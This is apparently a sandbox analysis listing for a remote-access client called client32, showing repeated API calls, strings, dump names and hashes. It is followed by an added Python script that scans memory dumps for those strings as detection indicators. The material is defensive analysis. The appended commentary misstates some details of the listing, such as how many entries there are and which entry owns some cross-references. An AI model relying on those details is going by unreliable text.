                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001056
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 819365019-2830328467
                                                                                                                                                                                                    • Opcode ID: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
                                                                                                                                                                                                    • Instruction ID: 2149dfb7d7fad2f484445a2ad992c90f1569e5591f5ea3f8663e4569b2fc6047
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EE086B5A00359BFD710DE45DCC5FD7B3ACEF54765F008429F95987240D6B0E99087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 110010E6
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 906220102-2830328467
                                                                                                                                                                                                    • Opcode ID: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
                                                                                                                                                                                                    • Instruction ID: 526bb494f44a88d6c72e7bb0fbd3121225ec46d2648d8932a1e0f472dc4001e3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9E086B5A0021DBFD710DE45DC85FD7B3ACEB48764F008429FA1487600DAB0F950C7A0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000001), ref: 1101D09F
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1101D086
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D081
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessagePointsProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2663631564-2830328467
                                                                                                                                                                                                    • Opcode ID: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
                                                                                                                                                                                                    • Instruction ID: 9c4b2b82cd9adc94e853c670648ed6e4092ddceab183af3ebe85ec827fccdc52
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE0C2B1640319BBD210DA41EC86FE6B39C8B10765F008039F61856580D9B0A98087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001126
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1604732272-2830328467
                                                                                                                                                                                                    • Opcode ID: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                                                                                                    • Instruction ID: 23928ab379678a07e0f3a28c7a56dac56e7f9ec3f6936ec539a74ac81f8319a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FD02BB5A1032DABC314CA41DC81FD2F3AC9B103A4F004039F62442100D571E540C394
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001016
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitKillLastMessageProcessTimerwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2229609774-2830328467
• Opcode ID: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
• Instruction ID: ee2bff440c1eeb311b517f53df1393b18d0186c38d15746519086ed5f67e1e1e
• Opcode Fuzzy Hash: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
• Instruction Fuzzy Hash: 50D02BB260032DABC310D641DC80FD2B3DCDB04364F008039FA5442140D670E4808390
APIs
• GetVersion.KERNEL32(1100D73E,?), ref: 1100D4C9
• LoadLibraryA.KERNEL32(AudioCapture.dll), ref: 1100D4D8
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoadVersion
• String ID: AudioCapture.dll
• API String ID: 3209957514-2642820777
• Opcode ID: 31160a4b39b369407e5d036c5ac5907d5ccb4198c4cf7eae390eb598ea28f55a
• Instruction ID: de40c63e4a8a4fcde3dee2054331c33ed72f965d5ee4918db061c4a53d5809d0
• Opcode Fuzzy Hash: 31160a4b39b369407e5d036c5ac5907d5ccb4198c4cf7eae390eb598ea28f55a
• Instruction Fuzzy Hash: 6AE01774E001638BF3029FB5884838E76D0A740699FC280B0ED22C0548FF6894808B31
APIs
• KillTimer.USER32(?,00000001,?,11049246), ref: 11131446
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
• m_hWnd, xrefs: 11131433
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1113142E
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitKillLastMessageProcessTimerwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2229609774-2830328467
• Opcode ID: 205b0686d5236623331a90bfebdaad10eac3ab33d7e388880e187d4356a02918
• Instruction ID: cbf25270b3b0651c58eed5869a3c9c02c4a96de395069bf87a5b764b24bbb751
• Opcode Fuzzy Hash: 205b0686d5236623331a90bfebdaad10eac3ab33d7e388880e187d4356a02918
• Instruction Fuzzy Hash: 1AD0A775A503659FD7209626EC85FC1B2E81F04718F048428F55567584D7B4E4C08755
APIs
• FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1110F3EA
• SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 1110F400
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FindMessageSendWindow
                                                                                                                                                                                                    • String ID: MSOfficeWClass
                                                                                                                                                                                                    • API String ID: 1741975844-970895155
                                                                                                                                                                                                    • Opcode ID: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
                                                                                                                                                                                                    • Instruction ID: 17eb5a188d88a84c71184668e46e9585b6c12665a03152ba016c754b78296158
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BD0127035035977E6001AA2DD4EF99BB5CDB44B55F118024F706AA0C1DBB0B440876A
APIs
• GetMenu.USER32(00000000), ref: 1101D064
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
• m_hWnd, xrefs: 1101D053
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D04E
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMenuMessageProcesswsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 1590435379-2830328467
• Opcode ID: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
• Instruction ID: a479ae3ba71ad1bbfd929d5f192baf473b643c420dccf9ee561c4944f6f7f77e
• Opcode Fuzzy Hash: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
• Instruction Fuzzy Hash: 51D022B5E0023AABC320E611ECC8FC6B2A85B00318F044468F12062000E678E480C380
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MenuProp
• String ID: OldMenu
• API String ID: 601939786-3235417843
• Opcode ID: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
• Instruction ID: 521654fc19124d4f771c6bc11addf53dd8358c346f2b3ea316e48a946e839c39
• Opcode Fuzzy Hash: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
• Instruction Fuzzy Hash: 96C0123260653D7782421A959D85ACEF76CAD162653008062FA10A2100F724551187EA
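The three function entries above carry static strings that survive in the client32 image: the build-tree path e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h and the expression m_hWnd (the second entry's subcall, GetLastError, wsprintfA, MessageBoxA captioned "Client32", then ExitProcess, has the shape of a compiled-in assertion handler, which is why a source path is embedded at all), the window class MSOfficeWClass looked up by FindWindowA, and the window property name OldMenu. The following is an added triage script, not Joe Sandbox output and not NetSupport code, that scans a raw dump region such as the .sdmp files listed under Memory Dump Source for exactly those strings in both ASCII and UTF-16LE and, as a generalisation, pulls out every NUL-terminated drive-letter source path ending in .h/.hpp/.c/.cpp, since assertion handlers in other builds embed paths the same way. The indicator names and the sample blob are constructed for the example; the only strings taken from the page are the five listed above.

```python
"""Scan a raw memory-dump region for the static strings seen in the
client32 function listing.  Added example; not from Joe Sandbox or NetSupport."""
import re
from typing import Dict, List, NamedTuple


class Hit(NamedTuple):
    name: str        # indicator label (constructed for this example)
    encoding: str    # "ascii" or "utf-16le"
    offset: int      # byte offset of the match inside the dump


# The five strings come from the function entries above; the labels are ours.
# Raw strings are required: "\n" in the path is a backslash-n, not a newline.
INDICATORS: Dict[str, str] = {
    "build_path":     r"e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h",
    "assert_expr":    "m_hWnd",
    "window_class":   "MSOfficeWClass",
    "msgbox_caption": "Client32",
    "window_prop":    "OldMenu",
}

# Any NUL-terminated ASCII path like "X:\...\file.h" or "...\file.cpp".
# Non-greedy so one match stops at the first source-file suffix + NUL.
SOURCE_PATH_RE = re.compile(rb"[A-Za-z]:\\[\x20-\x7e]{1,200}?\.(?:h|hpp|c|cpp)\x00")


def scan(blob: bytes) -> List[Hit]:
    """Return every occurrence of each indicator, in ASCII and UTF-16LE."""
    hits: List[Hit] = []
    for name, text in INDICATORS.items():
        for enc in ("ascii", "utf-16le"):
            needle = text.encode(enc)
            start = 0
            while (pos := blob.find(needle, start)) != -1:
                hits.append(Hit(name, enc, pos))
                start = pos + 1
    return sorted(hits, key=lambda h: h.offset)


def source_paths(blob: bytes) -> List[str]:
    """Extract all embedded source paths (the generalised build-path check)."""
    found = {m.group(0)[:-1].decode("ascii") for m in SOURCE_PATH_RE.finditer(blob)}
    return sorted(found)


def summarize(blob: bytes) -> Dict[str, object]:
    hits = scan(blob)
    names = {h.name for h in hits}
    return {
        "hits": hits,
        "indicator_names": sorted(names),
        "source_paths": source_paths(blob),
        # The build path is the most specific string here; "Client32",
        # "OldMenu" and "m_hWnd" are generic enough to appear in unrelated
        # software, so on their own they only corroborate.
        "build_path_present": "build_path" in names,
    }


def constructed_sample() -> bytes:
    """Constructed stand-in for a dump region: filler, the listing's strings as
    NUL-terminated ASCII, and the window-class name once as UTF-16LE."""
    parts = [
        b"\x00" * 64,
        b"MZ\x90\x00" + b"\x00" * 60,
        INDICATORS["build_path"].encode("ascii") + b"\x00",
        b"m_hWnd\x00",
        b"Client32\x00",
        b"OldMenu\x00",
        b"\xcc" * 32,
        "MSOfficeWClass".encode("utf-16le") + b"\x00\x00",
        b"\x00" * 64,
    ]
    return b"".join(parts)


if __name__ == "__main__":
    # Replace constructed_sample() with open(path, "rb").read() on a real .sdmp.
    report = summarize(constructed_sample())
    for h in report["hits"]:
        print(f"{h.offset:#08x} {h.encoding:9} {h.name}")
    print("source paths:", report["source_paths"])
    print("build path present:", report["build_path_present"])
```

Run it against the region named as Source File in the entries (the 11001000 .text dump) rather than the whole process, so that hits can be tied back to the xref addresses the listing gives (1101D04E and 1101D053 for the two strings of the second entry). Searching both encodings matters because the A-suffixed APIs in the listing take ASCII, while the same names can be stored as UTF-16 elsewhere in a Windows image.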